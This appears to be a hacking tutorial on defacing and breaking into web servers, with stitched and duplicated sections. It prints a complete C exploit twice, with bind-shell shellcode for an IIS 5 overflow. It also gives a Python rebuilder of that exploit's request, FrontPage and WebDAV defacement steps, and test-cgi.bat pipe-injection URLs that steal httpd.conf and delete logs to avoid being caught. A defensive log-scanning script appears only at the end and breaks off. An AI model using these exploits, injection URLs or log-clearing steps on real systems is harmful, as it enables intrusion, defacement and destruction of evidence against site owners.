    /* Both addresses are for the Windows 2000 build the authors tested on;
       any other build needs its own values. */
    DWORD srcdata = 0x01e2fb1c - 4;   /* 0x00457474 */
    /* address of SHELLCODE */
    DWORD jmpaddr = 0x00457494;       /* 0x77ebf094; 0x01e6fcec;
                                         "\x1c\xfb\xe6\x01"; "\x0c\xfb\xe6\x01" */
    char *destIP = argv[1];
    char *destFile = argv[3];
    int webport = atoi(argv[2]);
    char *pad = "\xcc\xcc\xcc\xcc" "ADPA" "\x02\x02\x02\x02" "PADP";   /* 16 bytes */
    WSADATA ws;
    SOCKET s;
    long result = 0;

    if (WSAStartup(0x0101, &ws) != 0)
    {
        puts("WSAStartup() error");
        return -1;
    }

    struct sockaddr_in addr;
    addr.sin_family = AF_INET;
    addr.sin_port = htons(webport);
    addr.sin_addr.s_addr = inet_addr(destIP);

    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s == -1)
    {
        puts("Socket create error");
        return -1;
    }
    if (connect(s, (struct sockaddr *)&addr, sizeof(addr)) == -1)
    {
        puts("Cannot connect to the specified host");
        return -1;
    }

    char buff[4096];
    /* Bind-shell payload: builds the strings "kernel32", "wsock32." and "cmd."
       on the stack, resolves the socket functions through two kernel32 addresses
       fixed for this Windows 2000 build, listens on TCP 1111 and pipes cmd.exe
       to the accepted connection. */
    char *shellcode =
        "\x55\x8b\xec\x33\xc0\xb0\xf0\xf7\xd8\x03\xe0\x8b\xfc\x33\xc9\x89"
        "\x8d\x2c\xff\xff\xff\xb8\x6b\x65\x72\x6e\xab\xb8\x65\x6c\x33\x32"
        "\xab\x32\xc0\xaa\xb8\x77\x73\x6f\x63\xab\xb8\x6b\x33\x32\x2e\xab"
        "\x4f\x32\xc0\xaa\x8d\x7d\x80\xb8\x63\x6d\x64\x2e\xab\x32\xc0\x4f"
        "\xaa\xb8\x23\x80\xe7\x77\x8d\x9d\x10\xff\xff\xff\x53\xff\xd0\x89"
        "\x45\xfc\xb8\x23\x80\xe7\x77\x8d\x9d\x19\xff\xff\xff\x53\xff\xd0"
        "\x89\x45\xf8\xbb\x4b\x56\xe7\x77\x6a\x47\xff\x75\xfc\xff\xd3\x89"
        "\x45\xf4\x6a\x48\xff\x75\xfc\xff\xd3\x89\x45\xf0\x33\xf6\x66\xbe"
        "\x1d\x02\x56\xff\x75\xfc\xff\xd3\x89\x45\xec\x66\xbe\x3e\x02\x56"
        "\xff\x75\xfc\xff\xd3\x89\x45\xe8\x66\xbe\x0f\x03\x56\xff\x75\xfc"
        "\xff\xd3\x89\x45\xe4\x66\xbe\x9d\x01\x56\xff\x75\xfc\xff\xd3\x89"
        "\x85\x34\xff\xff\xff\x66\xbe\xc4\x02\x56\xff\x75\xfc\xff\xd3\x89"
        "\x85\x28\xff\xff\xff\x33\xc0\xb0\x8d\x50\xff\x75\xfc\xff\xd3\x89"
        "\x85\x18\xff\xff\xff\x6a\x73\xff\x75\xf8\xff\xd3\x89\x45\xe0\x6a"
        "\x17\xff\x75\xf8\xff\xd3\x89\x45\xdc\x6a\x02\xff\x75\xf8\xff\xd3"
        "\x89\x45\xd8\x33\xc0\xb0\x0e\x48\x50\xff\x75\xf8\xff\xd3\x89\x45"
        "\xd4\x6a\x01\xff\x75\xf8\xff\xd3\x89\x45\xd0\x6a\x13\xff\x75\xf8"
        "\xff\xd3\x89\x45\xcc\x6a\x10\xff\x75\xf8\xff\xd3\x89\x45\xc8\x6a"
        "\x03\xff\x75\xf8\xff\xd3\x89\x85\x1c\xff\xff\xff\x8d\x7d\xa0\x32"
        "\xe4\xb0\x02\x66\xab\x66\xb8\x04\x57\x66\xab\x33\xc0\xab\xf7\xd0"
        "\xab\xab\x8d\x7d\x8c\x33\xc0\xb0\x0e\xfe\xc8\xfe\xc8\xab\x33\xc0"
        "\xab\x40\xab\x8d\x45\xb0\x50\x33\xc0\x66\xb8\x01\x01\x50\xff\x55"
        "\xe0\x33\xc0\x50\x6a\x01\x6a\x02\xff\x55\xdc\x89\x45\xc4\x6a\x10"
        "\x8d\x45\xa0\x50\xff\x75\xc4\xff\x55\xd8\x6a\x01\xff\x75\xc4\xff"
        "\x55\xd4\x33\xc0\x50\x50\xff\x75\xc4\xff\x55\xd0\x89\x45\xc0\x33"
        "\xff\x57\x8d\x45\x8c\x50\x8d\x45\x98\x50\x8d\x45\x9c\x50\xff\x55"
        "\xf4\x33\xff\x57\x8d\x45\x8c\x50\x8d\x45\x90\x50\x8d\x45\x94\x50"
        "\xff\x55\xf4\xfc\x8d\xbd\x38\xff\xff\xff\x33\xc9\xb1\x44\x32\xc0"
        "\xf3\xaa\x8d\xbd\x38\xff\xff\xff\x33\xc0\x66\xb8\x01\x01\x89\x47"
        "\x2c\x8b\x45\x94\x89\x47\x38\x8b\x45\x98\x89\x47\x40\x89\x47\x3c"
        "\xb8\xf0\xff\xff\xff\x33\xdb\x03\xe0\x8b\xc4\x50\x8d\x85\x38\xff"
        "\xff\xff\x50\x53\x53\x53\x6a\x01\x53\x53\x8d\x4d\x80\x51\x53\xff"
        "\x55\xf0\x33\xc0\xb4\x04\x50\x6a\x40\xff\x95\x34\xff\xff\xff\x89"
        "\x85\x30\xff\xff\xff\x90\x33\xdb\x53\x8d\x85\x2c\xff\xff\xff\x50"
        "\x53\x53\x53\xff\x75\x9c\xff\x55\xec\x8b\x85\x2c\xff\xff\xff\x85"
        "\xc0\x74\x49\x33\xdb\x53\xb7\x04\x8d\x85\x2c\xff\xff\xff\x50\x53"
        "\xff\xb5\x30\xff\xff\xff\xff\x75\x9c\xff\x55\xe8\x85\xc0\x74\x6d"
        "\x33\xc0\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30\xff\xff\xff\xff"
        "\x75\xc0\xff\x55\xcc\x83\xf8\xff\x74\x53\xeb\x10\x90\x90\x90\x90"
        "\x90\x90\x6a\x32\xff\x95\x28\xff\xff\xff\xeb\x99\x90\x90\x33\xc0"
        "\x50\xb4\x04\x50\xff\xb5\x30\xff\xff\xff\xff\x75\xc0\xff\x55\xc8"
        "\x83\xf8\xff\x74\x28\x89\x85\x2c\xff\xff\xff\x33\xc0\x50\x8d\x85"
        "\x2c\xff\xff\xff\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30\xff\xff"
        "\xff\xff\x75\x90\xff\x55\xe4\x85\xc0\x74\x02\xeb\xb4\xff\x75\xc4"
        "\xff\x95\x1c\xff\xff\xff\xff\x75\xc0\xff\x95\x1c\xff\xff\xff\x6a"
        "\xff\xff\x95\x18\xff\xff\xff";

    char *s1 = "POST ";            /* " HTTP/1.1\r\n" is supplied by the format string */
    char *s2 = "Accept: */*\r\n";
    char *s4 = "Content-Type: application/x-www-form-urlencoded\r\n";
    char *s5 = "Transfer-Encoding: chunked\r\n\r\n";
    char *sc = "0\r\n\r\n\r\n";

    /* 8 KB NOP sled with the shellcode at its end; it is sent as the query string */
    char shellcodebuff[1024 * 8];
    memset(shellcodebuff, 0x90, sizeof(shellcodebuff));
    memcpy(&shellcodebuff[sizeof(shellcodebuff) - strlen(shellcode) - 1], shellcode, strlen(shellcode));
    shellcodebuff[sizeof(shellcodebuff) - 1] = 0;

    /* Chunked body: a 16-byte pad chunk, then two 4-byte chunks (AAAA, BBBB)
       that are overwritten below with srcdata and jmpaddr, then the 0 chunk */
    char sendbuff[1024 * 16];
    memset(sendbuff, 0, 1024 * 16);
    sprintf(sendbuff,
            "%s%s?%s HTTP/1.1\r\n%sHost: %s\r\n%s%s10\r\n%s\r\n4\r\nAAAA\r\n4\r\nBBBB\r\n%s",
            s1, destFile, shellcodebuff, s2, destIP, s4, s5, pad, /*srcdata, jmpaddr,*/ sc);

    /* The length is taken before patching: jmpaddr contains a 0x00 byte that
       would otherwise truncate what strlen() sees */
    int sendlen = strlen(sendbuff);
    *(DWORD *)strstr(sendbuff, "BBBB") = jmpaddr;
    *(DWORD *)strstr(sendbuff, "AAAA") = srcdata;

    result = send(s, sendbuff, sendlen, 0);
    if (result == -1)
    {
        puts("Send shellcode error");
        return -1;
    }

    /* An HTML error page back means the overflow did not land */
    memset(buff, 0, 4096);
    result = recv(s, buff, sizeof(buff), 0);
    if (strstr(buff, "<html>") != NULL)
    {
        shutdown(s, 0);
        closesocket(s);
        puts("Send shellcode error! Try again!");
        return -1;
    }

    shutdown(s, 0);
    closesocket(s);
    printf("\nUse <telnet %s 1111> to connect to the host\n", destIP);
    puts("If you cannot connect to the host, try running this program again!");
    return 0;
}

The above code is what is called an exploit. Exploits are written in powerful programming languages such as C, Perl or sometimes Java, and each one is written for a specific vulnerability. The vulnerabilities were discovered in the past, and nowadays server software and operating systems have been patched for them, so you cannot simply execute exploit code to break into a server; you must rework an exploit so that it works according to your needs. In the listing above that means the hard-coded addresses: srcdata, jmpaddr and the two kernel32 function addresses embedded in the shellcode are valid only for the build of Windows 2000 the authors tested on, and a target running another language version or service pack needs addresses found for that build, otherwise the request simply crashes the ASP worker. One more thing I must mention: keep yourself updated on the latest vulnerabilities by visiting the sites mentioned earlier in the tutorial. I think it is better that you write your own exploit code, in Perl or C, in order to break into websites.

NOTE: I am talking about high-profile websites, not lame websites coded in Notepad.
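To rework an exploit like the one above you first have to see exactly what it puts on the wire, and the sprintf() call hides that. The following Python is an added example, not part of the tutorial or of the CHINANSL code: it rebuilds the same HTTP message (the 8 KB NOP sled ending in the shellcode as the query string, then the chunked body of a 16-byte pad chunk, a 4-byte chunk holding srcdata, a 4-byte chunk holding jmpaddr and the zero chunk), and decodes the chunked body the way a receiver must, so the framing can be checked before any address is changed. The pad bytes and the two addresses are those in the C source; the shellcode is a constructed placeholder, the host 192.0.2.10 is a lab address and /iisstart.asp is the path from the C usage text. Nothing is sent.

```python
import struct

PAD = b"\xcc\xcc\xcc\xcc" b"ADPA" b"\x02\x02\x02\x02" b"PADP"   # the 16-byte pad chunk from the C source
SRCDATA = 0x01e2fb1c - 4     # DWORD srcdata in the C source
JMPADDR = 0x00457494         # DWORD jmpaddr in the C source; note its 0x00 high byte
PLACEHOLDER_SHELLCODE = b"\x90" * 16 + b"\xcc"   # constructed: NOP sled + INT3, not the real payload


def build_request(host, asp_path, shellcode=PLACEHOLDER_SHELLCODE, srcdata=SRCDATA,
                  jmpaddr=JMPADDR, sled_size=8 * 1024):
    """Same message the C code builds with sprintf(): an 8 KB buffer of NOPs ending
    in the shellcode travels in the query string, and the chunked body carries a
    16-byte pad chunk, a 4-byte chunk with srcdata, a 4-byte chunk with jmpaddr
    and the terminating zero chunk (with the C code's extra CRLF)."""
    if len(shellcode) >= sled_size:
        raise ValueError("shellcode does not fit in the sled buffer")
    sled = b"\x90" * (sled_size - 1 - len(shellcode)) + shellcode   # sizeof-1: the C string's NUL
    head = (b"POST " + asp_path.encode() + b"?" + sled + b" HTTP/1.1\r\n"
            + b"Accept: */*\r\n"
            + b"Host: " + host.encode() + b"\r\n"
            + b"Content-Type: application/x-www-form-urlencoded\r\n"
            + b"Transfer-Encoding: chunked\r\n\r\n")
    body = (b"10\r\n" + PAD + b"\r\n"                               # 0x10 = 16 bytes
            + b"4\r\n" + struct.pack("<I", srcdata) + b"\r\n"      # the C code patches these
            + b"4\r\n" + struct.pack("<I", jmpaddr) + b"\r\n"      # over 'AAAA' and 'BBBB'
            + b"0\r\n\r\n\r\n")
    return head + body


def split_message(message):
    """Separate the header block from the body at the first blank line."""
    head, _, body = message.partition(b"\r\n\r\n")
    return head, body


def decode_chunks(body):
    """Decode a chunked body the way a receiver must: hex size, CRLF, data, CRLF,
    until a zero-size chunk. Raises if the framing is inconsistent."""
    chunks, pos = [], 0
    while True:
        nl = body.index(b"\r\n", pos)
        size = int(body[pos:nl], 16)
        pos = nl + 2
        if size == 0:
            return chunks
        data = body[pos:pos + size]
        if len(data) != size or body[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError(f"malformed chunk at offset {pos}")
        chunks.append(data)
        pos += size + 2


if __name__ == "__main__":
    head, body = split_message(build_request("192.0.2.10", "/iisstart.asp"))
    print(head[:40], "...", len(head), "header bytes")
    for chunk in decode_chunks(body):
        print(len(chunk), chunk.hex())
```

The decoded chunks show why the C code computes sendlen before patching: jmpaddr packs to 94 74 45 00, and that trailing zero would have ended the string for strlen(). Swapping in addresses for another Windows 2000 build means changing only SRCDATA and JMPADDR here and checking that the decoded chunks still come out as 16, 4 and 4 bytes.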

Keeping yourself safe

You must be familiar with server software such as Apache and Microsoft IIS, so you must know about the log files, which record each and every request made to the server. As they record everything, system administrators will have no problem catching the malicious cracker or script kiddie: the log file holds the IP (Internet Protocol) address of every client, and through the IP address the cracker or script kiddie can be traced.

NOTE: Read my tutorial on Gathering Information of a Remote Host.

TIP: If you do not want to get busted, you must clear the log files after you break into a web server.

CLEARING LOGS

You must clear the logs in order to save yourself from getting busted. On Apache you can use the same command-injection flaw in test-cgi.bat shown earlier (it is command injection through the shell, not a cross-site scripting vulnerability) to delete the log files, by requesting the following URL:

http://www.target.com/cgi-bin/test-cgi.bat|DEL+log

NOTE: The above URL applies to Apache. The log name and path must match the ErrorLog and CustomLog entries in the httpd.conf you retrieved, and on Windows the running server may hold the active log file open, in which case the DEL fails. Logs that the administrator forwards to another host cannot be cleared this way at all.

In the case of IIS on Windows 2000 you can get a DOS shell through telnet with the CHINANSL exploit listed above under "Overworking known vulnerabilities to break into a server". It exploits a buffer overflow in IIS 5 on Windows 2000 Server, opens port 1111 on the target and binds a shell to it; if the exploit is successful, all you have to do is telnet to port 1111 of the target and the system is yours. The instructions for compiling and running it are given under "Implementation of the code" on this page.

Page 9: Defacing Website

- To test if write access permission is enabled for anonymous web

clients then telnet the web server or the website in port 80 and

make the following request

PUT scriptshtwasp HTTP11

Host iis-server

Content-Length 10 ltentergtltentergt

Once you make the following request the server should respond

with a 100 Continue Message

HTTP11 100 Continue

Server Microsoft-IIS50

Date Sun 17 Feb 2006 105300 GMT

On receiving the above type 10 letters

XXXXXXXXXX

HTTP11 201 Created

Server Microsoft-IIS50

Date Sun 17 Feb 2006 105608 GMT

Location httpiis-serverdirmy_filetxt

Content-Length 0

Allow OPTIONS TRACE GET HEAD DELETE PUT COPY

MOVE PROPFIND PROPPATCH SEARCH LOCK UNLOCK

If the server responds with this 201 Created response then the

write permission is enabled

EXECUTION ACCESS

Server side pages like ASP PHP JSP or DLL are used in highly

advanced database driven dynamic websites which dynamically

generates the HTML and sends it to the client (web browser)

These server side pages and other executables including DLL and

EXE files needs execution perquisites in the virtual directory

where they are kept

NOTE DLL EXE etc need execution perquisites they are kept in a

single virtual directory

DIRECTORY SURFING

It has been often seen that web servers to be more specific

virtual directories of web servers are configured as such to

provide directory surfing access to all clients or special clients

through proper authentications Actually directory browsing

means that you can list the file and folders present in your virtual

directory just as you see in your standalone system Well most of

the web server administrators turn off this feature But exploit

codes can be used to get directory listing of the virtual directory

EXPLOIT FOR DIRECTORY LISTING IN APACHE

Well if you are not familiar with apache then let me give you a

brief description Apache is a server in which you have to

configure your web server using command and scripts These

scripts and commands are kept in httpdconf file in capache

groupapacheconf folder default Apache installation on a

distinctive windows system This file contains all the settings of

the web server and if we get our hands into this file then we get

to know all the settings of the web server including the location of

log files directory permissions write access authentication levels

etc

So now letrsquos get on with the exploit As we know that Apache is

the most preferred web server This web server has a bat in its

cgi-bin directory This bat file is named as test-cgibat Actually

the motive of the bat file is to test the privileges of cgi-bin

directory

NOTE cgi-bin directory contains all the CGI and Perl scripts

Well it is quiet obvious that cgi-bin virtual directory has execution

permissions These conditions are exploited to perform out

pernicious attacks The bat file in Apache web server is called as

execution of DOS (Disk Operating Systems) The DOS shell is

spawned to it for execution Now we can use | (pipe) character

along with the batch file to execute commands on the remote

server

NOTE If you donrsquot know how to put the | (pipe) character then

donrsquot worry To put the pipe character press Alt+ the

character is just beside your backspace key

So the attack URL will be like this

httpwwwtargetcomcgi-bintest-cgibat|copy+confhttpd

conf+htdocshttpdconf

Through the above URL I have copied the httpdconf file from the

conf directory The conf directory mostly does not have read

access to the Apache web root that is htdocs virtual folder Now

we can easily download the httpdconf file using the following

URL

httptargetcomhttpdconf

Since it occupies in the Apache web root Through this method

you will get the httpdconf file and through the httpdconf file you

can get some worthful information about the web server

Inspecting known vulnerabilities

Generally websites are defaced and hacked using vulnerabilities

related with the server software or the Operating System running

the server software Well most of the lsquohackersrsquo deface websites

using vulnerabilities Please note I am talking about hackers not

script kiddies who deface websites using uncanny softwares So

you must know what vulnerability is well if you donrsquot know then

let me tell you all Vulnerability is an existing flaw or defect in the

software architecture which allows a hacker or cracker to take

control over the system or issue capricious system commands to

the server In every software or application or tool vulnerabilities

persist

httpwwwsecurityfocuscom

httpwwwpacketstormorg

httpwwwguininskicom

httpwwwinsecureorg

httpwwwsecuriteamcom

httpwwwslashdotorg

httpwwwtechnotroniccom

The above sites contain latest vulnerabilities with exploit codes

Even if you are an elite or a professional you will find the

information useful

Working with Exploits

Well, I must say this is the most exciting part of this tutorial. Okay, so www.victim.com is the target site. Well, through the above methods, I mean the methods I have explained earlier in the tutorial, we have found out that the website is running on Microsoft IIS server software. So it is time to find some vulnerability. I am using Acunetix Web Security Scanner to scan for vulnerabilities. You guys must know programming languages like Perl or socket programming or C; this is essential because through this you will be able to compile the exploits. So once you get a vulnerability, try exploiting it by executing it in your client (browser).

MICROSOFT FRONTPAGE EXTENSION EXPLOIT

This is one of the methods for website defacement using Microsoft Web Publishing Wizard. Using this method one can deface websites having FrontPage Server Extensions. By using Microsoft Web Publishing Wizard one can replace FrontPage Server Extension pages.

Follow the steps given below to execute the following exploit.

Telnet to the target website or web server on port 80:

C:\>telnet www.victim.com 80

You will get a blank screen; type GET and continue pressing Enter till the web server responds to your request:

GET <ENTER><ENTER>

NOTE: Web servers running on IIS have FrontPage Extensions enabled by default.

So after pressing Enter you will get the following:

HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Thu, 17 Feb 2006 04:18:45 GMT
Content-Type: text/html
Content-Length: 87

Once you get the HTTP Bad Request, you have to search for the homepage. Most of the sites have the default homepage as one of:

http://www.victimserver.com/main.asp
http://www.victimserver.com/index.html
http://www.victimserver.com/index.htm
http://www.victimserver.com/index.asp
http://www.victimserver.com/main.htm
http://www.victimserver.com/default.htm
http://www.victimserver.com/default.asp
http://www.victimserver.com/default.html

Keep trying all possible FrontPage extensions until the page loads. If the extension doesn't exist then it will give a 404 error.

Let us say you have got the homepage as www.victim.com/index.html, so design the page which you want to upload, or modify the homepage. Here the homepage is index.html; once you design the page or modify the page, save it as index.html.

Now open Web Publishing Wizard and follow the steps given below:

- Open Microsoft Web Publishing Wizard.
- Now browse to the file that you are going to upload. Here index.html is the file which we are going to upload.
- Now you get a screen where you have to name the web server. Type in anything and click on Advanced.
- Select the service provider from the drop-down box. This is nothing but the kind of uploading it is going to do. Since your motive is to deface the site, select the FrontPage Extended Web option, since this method of defacing works only for FrontPage-enabled sites.
- Type the URL of the victim server homepage in the given box; here it is www.victim.com/index.html.
- Here specify the URL that you type in the web browser to access the victim server website.
- Select the connection method that you use to access the internet.
- Click Finish. Voila, you have successfully replaced the victim's homepage with yours.

Reworking known vulnerabilities to break into a server

Before going deep into vulnerabilities you must know some exploit code. I am going to present some exploit code written in the most powerful programming language, C.

/*
 * Windows 2000 Server Exploit
 * By CHINANSL Security Team
 * Test on Windows 2000 Chinese Version, IIS 5.0, not patched
 * Warning: THIS PROGRAM WILL ONLY TEST
 * CHINANSL Technology CO., LTD  http://www.chinansl.com
 * keji@chinansl.com
 * Use MS VC++ to compile this piece of code.
 */
#include "stdafx.h"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#pragma comment(lib, "Ws2_32")

int main(int argc, char *argv[])
{
    if (argc != 4)
    {
        printf("%s ip port aspfilepath\n\n", argv[0]);
        printf(" ie. %s 127.0.0.1 80 /iisstart.asp\n", argv[0]);
        puts(" programed by keji@chinansl.com");
        return 0;
    }

    DWORD srcdata = 0x01e2fb1c - 4;   /* 0x00457474 */
    /* address of SHELLCODE */
    DWORD jmpaddr = 0x00457494;       /* 0x77ebf094; 0x01e6fcec; "\x1c\xfb\xe6\x01"; "\x0c\xfb\xe6\x01" */
    char *destIP = argv[1];
    char *destFile = argv[3];
    int webport = atoi(argv[2]);
    /* 16 bytes, sent as the first chunk of the body */
    char *pad = "\xcc\xcc\xcc\xcc" "ADPA" "\x02\x02\x02\x02" "PADP";

    WSADATA ws;
    SOCKET s;
    long result = 0;

    if (WSAStartup(0x0101, &ws) != 0)
    {
        puts("WSAStartup() error");
        return -1;
    }

    struct sockaddr_in addr;
    addr.sin_family = AF_INET;
    addr.sin_port = htons(webport);
    addr.sin_addr.s_addr = inet_addr(destIP);

    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s == -1)
    {
        puts("Socket create error");
        return -1;
    }
    if (connect(s, (struct sockaddr *)&addr, sizeof(addr)) == -1)
    {
        puts("Cannot connect to the specified host");
        return -1;
    }

    char buff[4096];
    char *shellcode =
        "\x55\x8b\xec\x33\xc0\xb0\xf0\xf7\xd8\x03\xe0\x8b\xfc\x33\xc9\x89"
        "\x8d\x2c\xff\xff\xff\xb8\x6b\x65\x72\x6e\xab\xb8\x65\x6c\x33\x32"
        "\xab\x32\xc0\xaa\xb8\x77\x73\x6f\x63\xab\xb8\x6b\x33\x32\x2e\xab"
        "\x4f\x32\xc0\xaa\x8d\x7d\x80\xb8\x63\x6d\x64\x2e\xab\x32\xc0\x4f"
        "\xaa\xb8\x23\x80\xe7\x77\x8d\x9d\x10\xff\xff\xff\x53\xff\xd0\x89"
        "\x45\xfc\xb8\x23\x80\xe7\x77\x8d\x9d\x19\xff\xff\xff\x53\xff\xd0"
        "\x89\x45\xf8\xbb\x4b\x56\xe7\x77\x6a\x47\xff\x75\xfc\xff\xd3\x89"
        "\x45\xf4\x6a\x48\xff\x75\xfc\xff\xd3\x89\x45\xf0\x33\xf6\x66\xbe"
        "\x1d\x02\x56\xff\x75\xfc\xff\xd3\x89\x45\xec\x66\xbe\x3e\x02\x56"
        "\xff\x75\xfc\xff\xd3\x89\x45\xe8\x66\xbe\x0f\x03\x56\xff\x75\xfc"
        "\xff\xd3\x89\x45\xe4\x66\xbe\x9d\x01\x56\xff\x75\xfc\xff\xd3\x89"
        "\x85\x34\xff\xff\xff\x66\xbe\xc4\x02\x56\xff\x75\xfc\xff\xd3\x89"
        "\x85\x28\xff\xff\xff\x33\xc0\xb0\x8d\x50\xff\x75\xfc\xff\xd3\x89"
        "\x85\x18\xff\xff\xff\x6a\x73\xff\x75\xf8\xff\xd3\x89\x45\xe0\x6a"
        "\x17\xff\x75\xf8\xff\xd3\x89\x45\xdc\x6a\x02\xff\x75\xf8\xff\xd3"
        "\x89\x45\xd8\x33\xc0\xb0\x0e\x48\x50\xff\x75\xf8\xff\xd3\x89\x45"
        "\xd4\x6a\x01\xff\x75\xf8\xff\xd3\x89\x45\xd0\x6a\x13\xff\x75\xf8"
        "\xff\xd3\x89\x45\xcc\x6a\x10\xff\x75\xf8\xff\xd3\x89\x45\xc8\x6a"
        "\x03\xff\x75\xf8\xff\xd3\x89\x85\x1c\xff\xff\xff\x8d\x7d\xa0\x32"
        "\xe4\xb0\x02\x66\xab\x66\xb8\x04\x57\x66\xab\x33\xc0\xab\xf7\xd0"
        "\xab\xab\x8d\x7d\x8c\x33\xc0\xb0\x0e\xfe\xc8\xfe\xc8\xab\x33\xc0"
        "\xab\x40\xab\x8d\x45\xb0\x50\x33\xc0\x66\xb8\x01\x01\x50\xff\x55"
        "\xe0\x33\xc0\x50\x6a\x01\x6a\x02\xff\x55\xdc\x89\x45\xc4\x6a\x10"
        "\x8d\x45\xa0\x50\xff\x75\xc4\xff\x55\xd8\x6a\x01\xff\x75\xc4\xff"
        "\x55\xd4\x33\xc0\x50\x50\xff\x75\xc4\xff\x55\xd0\x89\x45\xc0\x33"
        "\xff\x57\x8d\x45\x8c\x50\x8d\x45\x98\x50\x8d\x45\x9c\x50\xff\x55"
        "\xf4\x33\xff\x57\x8d\x45\x8c\x50\x8d\x45\x90\x50\x8d\x45\x94\x50"
        "\xff\x55\xf4\xfc\x8d\xbd\x38\xff\xff\xff\x33\xc9\xb1\x44\x32\xc0"
        "\xf3\xaa\x8d\xbd\x38\xff\xff\xff\x33\xc0\x66\xb8\x01\x01\x89\x47"
        "\x2c\x8b\x45\x94\x89\x47\x38\x8b\x45\x98\x89\x47\x40\x89\x47\x3c"
        "\xb8\xf0\xff\xff\xff\x33\xdb\x03\xe0\x8b\xc4\x50\x8d\x85\x38\xff"
        "\xff\xff\x50\x53\x53\x53\x6a\x01\x53\x53\x8d\x4d\x80\x51\x53\xff"
        "\x55\xf0\x33\xc0\xb4\x04\x50\x6a\x40\xff\x95\x34\xff\xff\xff\x89"
        "\x85\x30\xff\xff\xff\x90\x33\xdb\x53\x8d\x85\x2c\xff\xff\xff\x50"
        "\x53\x53\x53\xff\x75\x9c\xff\x55\xec\x8b\x85\x2c\xff\xff\xff\x85"
        "\xc0\x74\x49\x33\xdb\x53\xb7\x04\x8d\x85\x2c\xff\xff\xff\x50\x53"
        "\xff\xb5\x30\xff\xff\xff\xff\x75\x9c\xff\x55\xe8\x85\xc0\x74\x6d"
        "\x33\xc0\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30\xff\xff\xff\xff"
        "\x75\xc0\xff\x55\xcc\x83\xf8\xff\x74\x53\xeb\x10\x90\x90\x90\x90"
        "\x90\x90\x6a\x32\xff\x95\x28\xff\xff\xff\xeb\x99\x90\x90\x33\xc0"
        "\x50\xb4\x04\x50\xff\xb5\x30\xff\xff\xff\xff\x75\xc0\xff\x55\xc8"
        "\x83\xf8\xff\x74\x28\x89\x85\x2c\xff\xff\xff\x33\xc0\x50\x8d\x85"
        "\x2c\xff\xff\xff\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30\xff\xff"
        "\xff\xff\x75\x90\xff\x55\xe4\x85\xc0\x74\x02\xeb\xb4\xff\x75\xc4"
        "\xff\x95\x1c\xff\xff\xff\xff\x75\xc0\xff\x95\x1c\xff\xff\xff\x6a"
        "\xff\xff\x95\x18\xff\xff\xff";

    char *s1 = "POST ";
    char *s2 = "Accept: */*\r\n";
    char *s4 = "Content-Type: application/x-www-form-urlencoded\r\n";
    char *s5 = "Transfer-Encoding: chunked\r\n\r\n";
    char *sc = "0\r\n\r\n\r\n";

    /* 8 KB of NOP (0x90) padding with the shellcode at its end; appended to the request path */
    char shellcodebuff[1024 * 8];
    memset(shellcodebuff, 0x90, sizeof(shellcodebuff));
    memcpy(&shellcodebuff[sizeof(shellcodebuff) - strlen(shellcode) - 1], shellcode, strlen(shellcode));
    shellcodebuff[sizeof(shellcodebuff) - 1] = 0;

    char sendbuff[1024 * 16];
    memset(sendbuff, 0, 1024 * 16);
    /* chunked POST: one 0x10-byte chunk (pad), then two 4-byte chunks (AAAA, BBBB) patched below */
    sprintf(sendbuff,
            "%s%s%s HTTP/1.1\r\n%sHost: %s\r\n%s%s10\r\n%s\r\n4\r\nAAAA\r\n4\r\nBBBB\r\n%s",
            s1, destFile, shellcodebuff, s2, destIP, s4, s5, pad, sc);
    int sendlen = strlen(sendbuff);   /* measured before patching: jmpaddr contains a NUL byte */
    *(DWORD *)strstr(sendbuff, "BBBB") = jmpaddr;
    *(DWORD *)strstr(sendbuff, "AAAA") = srcdata;

    result = send(s, sendbuff, sendlen, 0);
    if (result == -1)
    {
        puts("Send shellcode error");
        return -1;
    }

    memset(buff, 0, 4096);
    result = recv(s, buff, sizeof(buff), 0);
    if (strstr(buff, "<html>") != NULL)
    {
        shutdown(s, 0);
        closesocket(s);
        puts("Send shellcode error, Try again");
        return -1;
    }
    shutdown(s, 0);
    closesocket(s);
    printf("\nUse <telnet %s 1111> to connect to the host\n", destIP);
    puts("If you cannot connect to the host, try run this program again!");
    return 0;
}

The above code is called an exploit code; these are written in powerful programming languages like C, Perl or sometimes Java. Exploit codes are written according to the vulnerability. Vulnerabilities were discovered in the past; nowadays it has been seen that server software and operating systems are patched for these vulnerabilities. So you can't just execute exploit code to break into a server; you must rework an exploit code so that it works according to your needs. One more thing I must mention is that you must keep yourself updated with the latest vulnerabilities by visiting the sites that I have mentioned earlier in the tutorial. Well, I think it's better that you code your own exploit code in Perl or C in order to break into websites.

NOTE: I am talking about high profile websites; I am not talking about lame websites coded in Notepad.

Keeping yourself safe

Well, you must be familiar with server software like Apache, Microsoft IIS, etc. So you must know about the log files, which record each and every request the server receives. As they record everything, system administrators will have no problem catching the malicious cracker or script kiddie, as the log file will have the IP (Internet Protocol) address, and through the IP address you can trace the cracker or the script kiddie.

NOTE: Read my tutorial on Gathering Information of Remote Host.

TIP: If you do not want to get busted you must clear the log files after you break into a web server.

CLEARING LOGS

You must clear the logs in order to save yourself from getting busted. So you can use the cross site scripting vulnerability to clear the log files. You can do so by executing the following URL:

http://www.target.com/cgi-bin/test-cgi.bat|DEL+log

NOTE: The above URL can be used on Apache server software.
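Both test-cgi.bat tricks on this page, copying httpd.conf into the web root earlier and the DEL command used here to clear the logs, leave a distinctive line in the Apache access log, and the access log is exactly what a defender should be watching (and shipping off-host, where a DEL on the server cannot reach it). The following is an added example of mine, not code from the tutorial: it scans Common Log Format lines for those two patterns; the log lines are constructed samples, and the command list, reason names and severities are assumptions.

```python
"""Detection for the test-cgi.bat pipe injection and the httpd.conf-in-webroot
retrieval in Apache access-log lines.  Added defender example, not code from the
tutorial; the sample log lines are constructed, and the command list and
severities are this example's own assumptions."""
import re
from urllib.parse import unquote_plus

# Apache Common Log Format: host ident user [time] "method target proto" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
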